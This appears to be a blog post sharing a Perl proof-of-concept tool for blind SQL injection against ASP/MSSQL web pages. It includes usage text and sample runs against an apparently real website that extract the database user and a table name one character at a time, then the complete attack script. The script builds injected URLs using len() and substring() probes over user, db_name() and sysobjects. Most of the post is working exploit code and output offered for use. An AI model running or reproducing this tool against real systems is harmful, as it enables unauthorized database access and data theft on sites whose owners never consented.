Yesterday I read cawan's article "SQL injection is a way of thinking about database penetration" and liked it a lot, so I implemented the method it proposes in Perl. This program is only a POC, so I only implemented guessing user(), db_name(), and the first table name; the other functions are not implemented yet. I also have not optimized the guessing part of the program: I used the algorithm that is easiest to write, which is relatively slow and inefficient.
If you think it is necessary, you can extend the program to guess all table names and table fields. Of course, if you plan to release it, don't write it in Perl ~~~~
The program's help output is as follows:
H:\temp> sin.pl
********************************************************************************
SQL Injection New Method POC
Method by cawan [est]
Coded by superlone [est]
Usage:
sin.pl URL
-u try to get user() return value
-d try to get db_name() return value
-t try to get first table name value
Example:
sin.pl http://www.xxx.com/userinfo.asp?id=1 -T
********************************************************************************
Guessing user() looks like this:
H:\temp> sin.pl http://www.aquavelvas.com/blog.asp?id=4 -u
[+] Testing if there is vul in your url page...
[+] SQL injection vulnerability found!
[+] Guessing user() return value length... Wait!
********************************************************************************
[+] user() return value length is [7]
********************************************************************************
[+] Guessing user() return value... Wait!
********************************************************************************
[+] The 1th letter is: t
[+] The 2th letter is: h
[+] The 3th letter is: o
[+] The 4th letter is: m
[+] The 5th letter is: a
[+] The 6th letter is: s
[+] The 7th letter is: a
[+] user() return value is [thomasa]
********************************************************************************
Guessing the first table name looks like this:
H:\temp> sin.pl http://www.aquavelvas.com/blog.asp?id=4 -T
[+] Testing if there is vul in your url page...
[+] SQL injection vulnerability found!
[+] Guessing first table name length... Wait!
********************************************************************************
[+] First table name length is [17]
[+] Guessing first table name value... Wait!
[+] The 1th letter is: g
[+] The 2th letter is: e
[+] The 3th letter is: o
[+] The 4th letter is: i
[+] The 5th letter is: p
[+] The 6th letter is: c
[+] The 7th letter is: o
[+] The 8th letter is: u
[+] The 9th letter is: n
[+] The 10th letter is: t
[+] The 11th letter is: r
[+] The 12th letter is: y
[+] The 13th letter is: w
[+] The 14th letter is: h
[+] The 15th letter is: o
[+] The 16th letter is: i
[+] The 17th letter is: s
[+] First table name value is [geoipcountrywhois]
********************************************************************************
It is very simple to implement, so please don't laugh at me... The code is as follows:
#!/usr/bin/perl
# Method by cawan [est]
# Coded by superlone [est]
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request;

# Character sets tried for every position: letters first, then digits.
my @alpha_code  = ('a' .. 'z');
my @number_code = (0 .. 9);

&help if (@ARGV == 0);

my $url = shift;
my $ua  = LWP::UserAgent->new;
my $opt = lc($ARGV[0] || '');    # -u / -d / -t, either case accepted

if ($opt eq "-u") {
    &testpage($url);
    print "[+] Guessing user() return value length... Wait!\n";
    print "*" x 80, "\n";
    # In T-SQL USER is a niladic function, so len(user) is valid as written.
    my $ilen = &guesslength($url, "user");
    print "[+] user() return value length is [" . $ilen . "]\n";
    print "*" x 80, "\n";
    print "[+] Guessing user() return value... Wait!\n";
    print "*" x 80, "\n";
    print "[+] user() return value is " . &crackcode($url, $ilen, "user") . "\n";
    print "*" x 80, "\n";
} elsif ($opt eq "-d") {
    &testpage($url);
    print "[+] Guessing db_name() return value length... Wait!\n";
    print "*" x 80, "\n";
    my $ilen = &guesslength($url, "db_name()");
    print "[+] db_name() return value length is [" . $ilen . "]\n";
    print "[+] Guessing db_name() return value... Wait!\n";
    print "*" x 80, "\n";
    print "[+] db_name() return value is " . &crackcode($url, $ilen, "db_name()") . "\n";
    print "*" x 80, "\n";
} elsif ($opt eq "-t") {
    &testpage($url);
    print "[+] Guessing first table name length... Wait!\n";
    print "*" x 80, "\n";
    my $ilen = &guesslength($url, "table");
    print "[+] First table name length is [" . $ilen . "]\n";
    print "[+] Guessing first table name value... Wait!\n";
    print "[+] First table name value is " . &crackcode($url, $ilen, "table") . "\n";
    print "*" x 80, "\n";
} else {
    &help;
}

# Find len($func): ask "len($func) > N" for N = 0, 1, 2, ... until the page
# errors (the condition became false), then the last true N is the length.
sub guesslength {
    my $url  = shift;
    my $func = shift;
    $func = "(select top 1 name from sysobjects where xtype='U')" if ($func eq "table");
    my $i = 0;
    while ($i < 32) {
        my $temp = $url . "'%20and%20len(" . $func . ")>'" . $i++;
        # print "[-] structured URL: " . $temp . "\n";
        my $req = HTTP::Request->new(GET => $temp);
        my $res = $ua->request($req);
        if ($res->content =~ /Syntax error/i || $res->content =~ /Either BOF or EOF is true/i) {
            last;
        }
    }
    return $i - 1;
}

# Append an unbalanced quote: if the parameter reaches the query unescaped,
# the server echoes a SQL syntax error, which is what we key on.
sub testpage {
    my $url = shift;
    $url .= "'%20and%201=1";
    my $req = HTTP::Request->new(GET => $url);
    # print "url is " . $url . "\n";
    print "\n[+] Testing if there is vul in your url page...\n";
    my $res = $ua->request($req);
    # print "Return content: " . $res->content . "\n";
    if ($res->content =~ /Syntax error/i) {
        print "[+] SQL injection vulnerability found!\n";
    } else {
        print "[+] Page has no vul or server error echo disabled!\n";
        exit;
    }
}

sub help {
    print "*" x 80, "\n";
    print "\t\tSQL Injection New Method POC\n";
    print "\tMethod by cawan [est]\n";
    print "\tCoded by superlone [est]\n";
    print "\tUsage:\n\t\tsin.pl URL\n";
    print "\t-u try to get user() return value\n";
    print "\t-d try to get db_name() return value\n";
    print "\t-t try to get first table name value\n";
    print "\tExample:\n\t\tsin.pl http://www.xxx.com/userinfo.asp?id=1 -t\n";
    print "*" x 80, "\n";
    exit;
}

# Recover $func one position at a time with "substring($func, k, 1) = 'c'",
# trying a..z and then 0..9 for each k.  The error string that marks a hit is
# site-specific; adjust it to whatever the target page actually echoes.
sub crackcode {
    my $url     = shift;
    my $userlen = shift;
    my $func    = shift;
    my $i       = 0;
    my $j       = 0;
    my $k       = 1;
    my $bfound  = 0;
    my $name    = '';
    $func = "(select top 1 name from sysobjects where xtype='U')" if ($func eq "table");
    while ($k <= $userlen) {
        $i = 0; $j = 0; $bfound = 0;
        while ($i < @alpha_code) {
            my $temp = $url . "'%20and%20substring(" . $func . "," . $k . ",1)='" . $alpha_code[$i++];
            # print $temp, "\n";
            my $req = HTTP::Request->new(GET => $temp);
            my $res = $ua->request($req);
            if ($res->content =~ /Incorrect syntax/i) {
                $name .= $alpha_code[$i - 1];
                print "[+] The " . $k . "th letter is: ", $alpha_code[$i - 1], "\n";
                $bfound = 1;
                last;
            }
        }
        while ($j < @number_code && $bfound == 0) {
            my $temp = $url . "'%20and%20substring(" . $func . "," . $k . ",1)='" . $number_code[$j++];
            # print $temp, "\n";
            my $req = HTTP::Request->new(GET => $temp);
            my $res = $ua->request($req);
            if ($res->content =~ /Incorrect syntax/i) {
                $name .= $number_code[$j - 1];
                # print the digit that matched (not the letter array)
                print "[+] The " . $k . "th letter is: ", $number_code[$j - 1], "\n";
                $bfound = 1;
                last;
            }
        }
        $k++;
    }
    return '[' . $name . ']';
}